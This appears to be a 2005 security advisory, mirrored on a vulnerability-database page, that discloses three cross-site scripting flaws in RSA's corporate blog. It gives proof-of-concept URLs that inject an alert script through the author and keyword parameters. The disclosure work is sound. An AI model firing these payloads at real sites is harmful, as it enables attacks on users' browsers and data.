Lucene search
rsaXSS.txt
๐๏ธย 15 Aug 2005ย 00:00:00Reported byย Rodrigo GutierrezTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 20ย Views
RSA "Speaking of Security" Blog 3 XSS vulnerabilities. Attacker can gather user data by fooling them and accessing modified vulnerable application
Show more
`RSA XSS Vulnerabilities
Author: Rodrigo Gutierrez <[email protected]>
Affected: RSA "Speaking of Security" Blog
Status: Notified Hereby
Vendor url: http://www.rsasecurity.com
Background.
RSA secures more than 15 million user identities, safeguards trillions
of business transactions annually and manages the confidentiality of data in
tens of thousands of applications worldwide. 3 cross site scripting
vulnerabilities
has been discovered in their Blog "Speaking of Security" ;) .
Impact
An attacker could gather data from the blog's users by fooling them, to
access the
modified vulnerable application.
Proof of Concept
http://www.rsasecurity.com/blog/index.asp?author=%22%3E%3Cscript%3Ealert('XS
S');%3C/script%3E
http://www.rsasecurity.com/blog/index.asp?keyword=%22%3E%3Cscript%3Ealert('X
SS');%3C/script%3E
http://www.rsasecurity.com/blog/bio.asp?author=%22%3E%3Cscript%3Ealert('XSS'
);%3C/script%3E
Just for the picture ;)
http://www.rsasecurity.com/blog/index.asp?author=%52%6f%64%72%69%67%6f%20%47
%75%74%69%65%72%72%65%7a
http://www.rsasecurity.com/blog/index.asp?keyword=%52%6f%64%72%69%67%6f%20%4
7%75%74%69%65%72%72%65%7a
Speaking of Security
RSA should spend some of those $307.5 million they earned in 2004 to audit
their web applications.
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo15 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4